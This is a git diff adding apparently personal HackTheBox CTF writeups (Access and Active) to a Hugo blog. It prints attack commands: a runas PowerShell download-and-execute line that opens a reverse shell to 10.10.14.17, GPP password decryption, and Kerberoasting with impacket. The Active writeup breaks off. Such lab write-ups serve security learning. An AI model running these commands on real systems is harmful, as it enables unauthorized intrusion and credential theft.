100644 content/writeup-ctf/writeup-wekor-thm/img/image-1.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-1.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-10.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-10.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-11.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-11.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-12.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-12.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-2.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-2.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-3.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-3.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-4.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-4.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-5.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-5.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-6.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-6.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-7.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-7.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-8.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-8.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-9.png create mode 100644 content/writeup-ctf/writeup-wekor-thm/img/image-9.webp create mode 100644 content/writeup-ctf/writeup-wekor-thm/index.md create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-1.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-1.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-10.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-10.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-11.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-11.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-12.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-12.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-13.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-13.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-2.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-2.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-3.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-3.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-4.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-4.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-5.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-5.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-6.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-6.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-7.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-7.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-8.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-8.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-9.png create mode 100644 content/writeup-ctf/writeup-wonderland-thm/img/image-9.webp create mode 100644 content/writeup-ctf/writeup-wonderland-thm/index.md diff --git a/.gitignore b/.gitignore index 1f3b413..f732d45 100644 --- a/.gitignore +++ b/.gitignore @@ -5,3 +5,4 @@ public #others node_modules .hugo_build.lock +*.lock diff --git a/config/_default/menus.en.toml b/config/_default/menus.en.toml index df4969b..77fe59f 100644 --- a/config/_default/menus.en.toml +++ b/config/_default/menus.en.toml @@ -43,6 +43,12 @@ pageRef = "categories/security" weight = 10 +[[main]] + name = "Writeup CTF" + parent = "Categories" + pageRef = "categories/writeup-ctf" + weight = 10 + [[main]] name = "About" pageRef = "about" diff --git a/content/categories/_index.md b/content/categories/_index.md index 7910cf4..ad57e8a 100644 --- a/content/categories/_index.md +++ b/content/categories/_index.md @@ -31,3 +31,13 @@ layout: "categories" + +--- + +{{< list title="Writeup CTF" cardView=true limit=3 where="Type" value="writeup-ctf" >}} + +
+ + + +
diff --git a/content/categories/writeup-ctf.md b/content/categories/writeup-ctf.md new file mode 100644 index 0000000..bc763b6 --- /dev/null +++ b/content/categories/writeup-ctf.md @@ -0,0 +1,11 @@ +--- +title: "Writeup CTF" +draft: false +slug: "writeup-ctf" +layout: "simple" +showWordCount: false +showReadingTime: false +showDate: false +--- + +{{< list title=" " cardView=true limit=99 where="Type" value="writeup-ctf" >}} diff --git a/.hugo_build.lock b/content/writeup-ctf/_index.md similarity index 100% rename from .hugo_build.lock rename to content/writeup-ctf/_index.md diff --git a/content/writeup-ctf/writeup-access-htb/featured.png b/content/writeup-ctf/writeup-access-htb/featured.png new file mode 100644 index 0000000..f357634 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b51df0e74336e5565534f4cb09a01b7e66fab1393aa076f240a1c26308e8a71 +size 247562 diff --git a/content/writeup-ctf/writeup-access-htb/featured.webp b/content/writeup-ctf/writeup-access-htb/featured.webp new file mode 100644 index 0000000..58602ac --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e51314a57cc1b2df2b39cc19dae575f2fce27457701787afeadf634d91407378 +size 30548 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-1.png b/content/writeup-ctf/writeup-access-htb/img/image-1.png new file mode 100644 index 0000000..a1a73ac --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:debd125b04ed35e60c06dd78d7630f1aec22bef25652c92f82aecd97659b7722 +size 38732 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-1.webp b/content/writeup-ctf/writeup-access-htb/img/image-1.webp new file mode 100644 index 0000000..df35602 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebe715c52e304a8dcac1d4b9f4bcf785d41cab4d8df6901e8a9377d4440655ee +size 35930 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-10.png b/content/writeup-ctf/writeup-access-htb/img/image-10.png new file mode 100644 index 0000000..cab7f60 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c61f9dc89032c76846256296e2279006dd537e24d59bbf6b93c4603bde6a6dd +size 17164 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-10.webp b/content/writeup-ctf/writeup-access-htb/img/image-10.webp new file mode 100644 index 0000000..66e75bb --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4829ef64164981667f357a2387226ce8268be76ec0f1578b7a397de3eaeb403a +size 18342 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-11.png b/content/writeup-ctf/writeup-access-htb/img/image-11.png new file mode 100644 index 0000000..cb2e30c --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f44ac88ab92bbc81b71ab5fa812d965edc57efcd59ba7544bc9d6a0f2e9b2fc0 +size 5277 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-11.webp b/content/writeup-ctf/writeup-access-htb/img/image-11.webp new file mode 100644 index 0000000..fc82e7e --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e548dd1560d08288bd8daf02234ea335232ed618645bd38f7ab783a010b40e7 +size 5252 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-2.png b/content/writeup-ctf/writeup-access-htb/img/image-2.png new file mode 100644 index 0000000..612248f --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0804195d00fc869748ad92d0ba0c552ebd2f4cf2a8721c3a3e0fe71c5ee7868d +size 377385 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-2.webp b/content/writeup-ctf/writeup-access-htb/img/image-2.webp new file mode 100644 index 0000000..27401b3 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8a96cc47dce9a9118c06d05a82559cc056c77b26e98285f3330332bf5af0591 +size 59020 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-3.png b/content/writeup-ctf/writeup-access-htb/img/image-3.png new file mode 100644 index 0000000..ba95bd1 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ccf5d2816c21e4a891409e4daf2e06700eedfa5e372799d038c22958e9a20a02 +size 25572 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-3.webp b/content/writeup-ctf/writeup-access-htb/img/image-3.webp new file mode 100644 index 0000000..4aca2da --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02aa87385edcf6cb51e4d88b0566d1658817b74dd58e0e4e2a51cab530358e20 +size 25282 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-4.png b/content/writeup-ctf/writeup-access-htb/img/image-4.png new file mode 100644 index 0000000..869b74b --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:26c092c06babcaeab06d21a509ffe556487b27101343eb2e7551895136285b5c +size 68897 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-4.webp b/content/writeup-ctf/writeup-access-htb/img/image-4.webp new file mode 100644 index 0000000..ea3b105 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:810ad324f9d6afe8f6ec34e0504eb4f2fc7fcce15a86675d49a0ba3c2d80f504 +size 100110 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-5.png b/content/writeup-ctf/writeup-access-htb/img/image-5.png new file mode 100644 index 0000000..f5c9c9e --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4e671142081762c8d6c7d9d4fd403daccfe70fd2075a50abdf3c39f15a55f84b +size 13166 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-5.webp b/content/writeup-ctf/writeup-access-htb/img/image-5.webp new file mode 100644 index 0000000..1b388ae --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:614af298ab2c72b25799719c378770f22de1c57306857b00b6381709acb13be2 +size 15444 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-6.png b/content/writeup-ctf/writeup-access-htb/img/image-6.png new file mode 100644 index 0000000..3afd3f7 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:007aebee2e19da280e53cee5f5c4a2a97e304a624be1a4635812ae863c243da8 +size 10675 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-6.webp b/content/writeup-ctf/writeup-access-htb/img/image-6.webp new file mode 100644 index 0000000..8a71ba2 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f256a1812e2f8fa19e305d83a2be726e5fda9c68a915435ad559148fbf25b4d +size 9252 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-7.png b/content/writeup-ctf/writeup-access-htb/img/image-7.png new file mode 100644 index 0000000..f1f6221 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05dc75d287304dd5231cf4b34d228376e220db4b54c0104adeb8a6b3425553c6 +size 16649 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-7.webp b/content/writeup-ctf/writeup-access-htb/img/image-7.webp new file mode 100644 index 0000000..bc3ffb8 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eab5e708f6931019b8f9212d9904bd7fbb16eb137c59bedb6a70644ff0a025e0 +size 12734 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-8.png b/content/writeup-ctf/writeup-access-htb/img/image-8.png new file mode 100644 index 0000000..6a67eb1 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9f1719ccc9f92de8ddb8b190d947a5457399b2b9481ace74bb6bb5ef00096ee +size 7162 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-8.webp b/content/writeup-ctf/writeup-access-htb/img/image-8.webp new file mode 100644 index 0000000..5bda8f1 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6290839b3432d304944df635a6954d7142d101839bdf1ee507d101574cbf4d4b +size 7402 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-9.png b/content/writeup-ctf/writeup-access-htb/img/image-9.png new file mode 100644 index 0000000..d7d26c7 --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5a21c43937a6427d140691c5bfa6eec85e7498fc4affb4c7309341387622720 +size 56522 diff --git a/content/writeup-ctf/writeup-access-htb/img/image-9.webp b/content/writeup-ctf/writeup-access-htb/img/image-9.webp new file mode 100644 index 0000000..a6c967b --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2bf179778bf508d3a49767378dc448fa801fcac6697e710899e812c41e12b4cc +size 53026 diff --git a/content/writeup-ctf/writeup-access-htb/index.md b/content/writeup-ctf/writeup-access-htb/index.md new file mode 100644 index 0000000..81a91df --- /dev/null +++ b/content/writeup-ctf/writeup-access-htb/index.md @@ -0,0 +1,106 @@ +--- +title: "Writeup - Access (HTB)" +date: 2022-04-15 +slug: "writeup-access-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Access](https://app.hackthebox.com/machines/Access) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.98 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 21/tcp : FTP +- 23/tcp : telnet +- 80/tcp : HTTP web server (httpd 7.5) + +![](img/image-2.webp) + +## Exploit + +In the `nmap` scan we find an FTP server, let's try to connect as `anonymous`. + +![](img/image-3.webp) + +There are 2 folders in which we find the following files: +- Access Control.zip +- backup.mdb + +{{< alert >}} +Before downloading the backup file with the command `get backup.mdb` you should use the command `binary`To read the contents of the backup file I use the command `mdb-tables`: +{{< /alert >}} + +![](img/image-4.webp) + +In the different tables I find `auth_user`, interesting there could be credencial for an account. + +![](img/image-5.webp) + +I find an `engineer` account with the password `access4u@security`. I use this password to try to decompress the previously recovered archive. + +In the archive I find a `.pst`. To read its contents I use the following command: + + +```bash +readpst Access\ Control.pst -M +``` +Among the different mails I find the following content: + +![](img/image-6.webp) + +A new password ! I try to connect to the telnet server with these credencials. + +![](img/image-7.webp) + +I now have a shell as `security` and I can get the first flag. + +![](img/image-8.webp) + +## Privilege escalation + +After a few minutes of exploration, I find a file on the Desktop of the `Public` user. In this file I find an interesting command! A runas with the user `Administrator`. + +![](img/image-9.webp) + +I will use this [script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to create a reverse shell Admin. So I get this file and I add the following line at the end of the file. + + +```bash +Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 1234 +``` +I then launch a web server on my machine. + + +```bash +python3 -m http.server 80 +``` +Then I download/run the script with the admin runas. + + +```bash +runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1')" +``` +I now have a reverse shell as Administrator! + +![](img/image-10.webp) + +So I can get the last flag back. + +![](img/image-11.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not let the `anonymous` user enable in FTP server configuration +- Do not store sensitive information in a folder accessible by several people via FTP/web/... +- Do not give runas Administrator permission to a user diff --git a/content/writeup-ctf/writeup-active-htb/featured.png b/content/writeup-ctf/writeup-active-htb/featured.png new file mode 100644 index 0000000..103653a --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0cbb76004b293bd70752a004680c6ad0b7f0a6ead1356f5f20510c2622e742c +size 302934 diff --git a/content/writeup-ctf/writeup-active-htb/featured.webp b/content/writeup-ctf/writeup-active-htb/featured.webp new file mode 100644 index 0000000..0f13bf2 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04560bd69275995fb2b53116d4b64028c95c01a36e63a06eb62e8abc4b50990c +size 31792 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-1.png b/content/writeup-ctf/writeup-active-htb/img/image-1.png new file mode 100644 index 0000000..6d02db4 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e89ecf0e35f94b8477bcec0a9473cbf7e6909e5df20e4a717447c205e960acbd +size 110133 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-1.webp b/content/writeup-ctf/writeup-active-htb/img/image-1.webp new file mode 100644 index 0000000..8b9cf4f --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03ae2848a225e04d693c0966511102667618e20ff12c37aa1eeba6aad67d2c3e +size 90268 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-10.png b/content/writeup-ctf/writeup-active-htb/img/image-10.png new file mode 100644 index 0000000..7430b8c --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:debd00a4d86e7aed855ec5197c5ac4d5cd095aa1b602527dee9ca1f0549a50e2 +size 32212 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-10.webp b/content/writeup-ctf/writeup-active-htb/img/image-10.webp new file mode 100644 index 0000000..50559ef --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:867d895f45b2781000b707ad2b553e2c2104916a792cab4fc4d01c0913be8f61 +size 26372 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-11.png b/content/writeup-ctf/writeup-active-htb/img/image-11.png new file mode 100644 index 0000000..63d08ab --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e78375848cad70aed8eb3d51f2ff94a7dd0964c3cf515fd1eb9df330bf42762 +size 31976 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-11.webp b/content/writeup-ctf/writeup-active-htb/img/image-11.webp new file mode 100644 index 0000000..c1e5b5b --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f475a9c2a387db7e17dc532efb63a91469d648332d746bdb264caab55f5058d +size 32492 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-2.png b/content/writeup-ctf/writeup-active-htb/img/image-2.png new file mode 100644 index 0000000..ed3856f --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ddc575a4f059a87a3c806b4525753b6f1341ea0ee2b577ee7af8dfaa7586c04 +size 57144 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-2.webp b/content/writeup-ctf/writeup-active-htb/img/image-2.webp new file mode 100644 index 0000000..c6e4040 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7cde51fc6e464a3c81324a533e039b491512faa0deeb59bc606bb306823430c +size 52190 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-3.png b/content/writeup-ctf/writeup-active-htb/img/image-3.png new file mode 100644 index 0000000..e2e4957 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e028a0655bded3892d83de48205f57b721bea3a70e82854f3d4d3abc29d1d21 +size 14429 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-3.webp b/content/writeup-ctf/writeup-active-htb/img/image-3.webp new file mode 100644 index 0000000..aaafca7 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7af2fcc27f11cced46af087fd8ddcc9f5f3012963edc2ce9591ef994836f55b2 +size 11832 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-4.png b/content/writeup-ctf/writeup-active-htb/img/image-4.png new file mode 100644 index 0000000..0da7e5d --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebc6d051c63e6289a353cd1a780c6ba93cc3bbf073566c744799f96570e9c8c0 +size 13174 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-4.webp b/content/writeup-ctf/writeup-active-htb/img/image-4.webp new file mode 100644 index 0000000..27fa8ac --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3651bf6062c36cbbf5e932918cf75f1618e88422572571e03be7721beaf0b968 +size 10568 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-5.png b/content/writeup-ctf/writeup-active-htb/img/image-5.png new file mode 100644 index 0000000..b73df9f --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c71356151756244db50e209eddd9bebfb9526d1c84699e988de42e4c5ed7e44b +size 26736 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-5.webp b/content/writeup-ctf/writeup-active-htb/img/image-5.webp new file mode 100644 index 0000000..8ead44d --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c04ac12d5df81241ed984be1c77524e1380cdc42427aaa55ad449645bee703f6 +size 19780 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-6.png b/content/writeup-ctf/writeup-active-htb/img/image-6.png new file mode 100644 index 0000000..746471d --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64e69d253c2ef12ab3dc3ebe9c94f7d1d2ff96dcd7fbc923d4d5b269ea76fd61 +size 27359 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-6.webp b/content/writeup-ctf/writeup-active-htb/img/image-6.webp new file mode 100644 index 0000000..9b6f8ed --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5b3fac547fae1c21afe52cade08ef1597104e365a8c9d78cbf06420b1e35c48 +size 32272 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-7.png b/content/writeup-ctf/writeup-active-htb/img/image-7.png new file mode 100644 index 0000000..47cc76c --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:481728e4736e177e67e7adc5569bc132af89db7a642b119b12436b36d40a3a4e +size 10933 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-7.webp b/content/writeup-ctf/writeup-active-htb/img/image-7.webp new file mode 100644 index 0000000..0884b71 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a654908123a53f6216e0b2e3272743e75cb90514cfff2e1e4a892f803b16a41 +size 10790 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-8.png b/content/writeup-ctf/writeup-active-htb/img/image-8.png new file mode 100644 index 0000000..db56dd6 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ae6b099111a7b77f5c364c12744bb5a5786e622388bc8b557b076e49ba199b1 +size 26543 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-8.webp b/content/writeup-ctf/writeup-active-htb/img/image-8.webp new file mode 100644 index 0000000..0b73ddb --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1ed6c9aa4d2014d0244b7070f1b5fc41d7908482418d4553463e2fb09194335e +size 25120 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-9.png b/content/writeup-ctf/writeup-active-htb/img/image-9.png new file mode 100644 index 0000000..158c342 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a8ff2e45eb7766f1c37dc1b1b1469103eb5b8be013385da3eb045378cb8f4fb +size 33009 diff --git a/content/writeup-ctf/writeup-active-htb/img/image-9.webp b/content/writeup-ctf/writeup-active-htb/img/image-9.webp new file mode 100644 index 0000000..6d6f6a0 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5919baac954e989ea7a57796a29afb21446fae2b1bfd703bb2496a05429d1f4a +size 32212 diff --git a/content/writeup-ctf/writeup-active-htb/index.md b/content/writeup-ctf/writeup-active-htb/index.md new file mode 100644 index 0000000..2cb90c4 --- /dev/null +++ b/content/writeup-ctf/writeup-active-htb/index.md @@ -0,0 +1,125 @@ +--- +title: "Writeup - Active (HTB)" +date: 2022-03-25 +slug: "writeup-active-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Active](https://app.hackthebox.com/machines/Active) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.100 +``` +Many TCP ports are discovered: + +![](img/image-1.webp) + +## Exploit + +First of all, let's make an enumeration of the users/shares with the following command: + + +```bash +enum4linux -a 10.10.10.100 +``` +![](img/image-2.webp) + +You can find a certain amount of information, but above all, a share is available for reading as an anonymous person. Let's see what we can find inside. To connect I use the following command: + + +```bash +smbclient --no-pass //10.10.10.100/Replication +``` +In the share there are two folders, one of which is of particular interest to me: `Policies`. In this folder I find the file `Groups.xml` which contains information allowing the exploitation of the machine. + +[Exploiting GPP SYSVOL (Groups.xml) | VK9 Security](https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/) + +![](img/image-3.webp) + +And indeed in the file I find 2 important information: `name` and `cpassword`. + + +```bash + + + +``` +As explained in the article above it is possible to decrypt the `cpassword` with the `gpp-decrypt` command. + +![](img/image-4.webp) + +We can therefore deduce the following credencials: + +user : active.htb\SVC\_TGS +pass : GPPstillStandingStrong2k18 + +I now look at the permissions I have with these credentials: + +![](img/image-5.webp) + +I now have access to the share `Users`, let's see what's inside: + +![](img/image-6.webp) + +I quickly find the first flag on the desktop of the SVC-TGS user: + +![](img/image-7.webp) + +## Privilege escalation + +To realize the elevation of privilege and since I have the credential of a user, I will do a Kerberoasting. + + +> Kerberoasting is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. [complx.com](https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/#:~:text=Kerberoasting%20is%20a%20post%2Dexploitation,poor%20service%20account%20password%20hygiene.) + +To perform the hashes extraction I will use the following command: + + +```bash +impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.10.10.100 -outputfile output.txt -request +``` +![](img/image-8.webp) + + +```bash 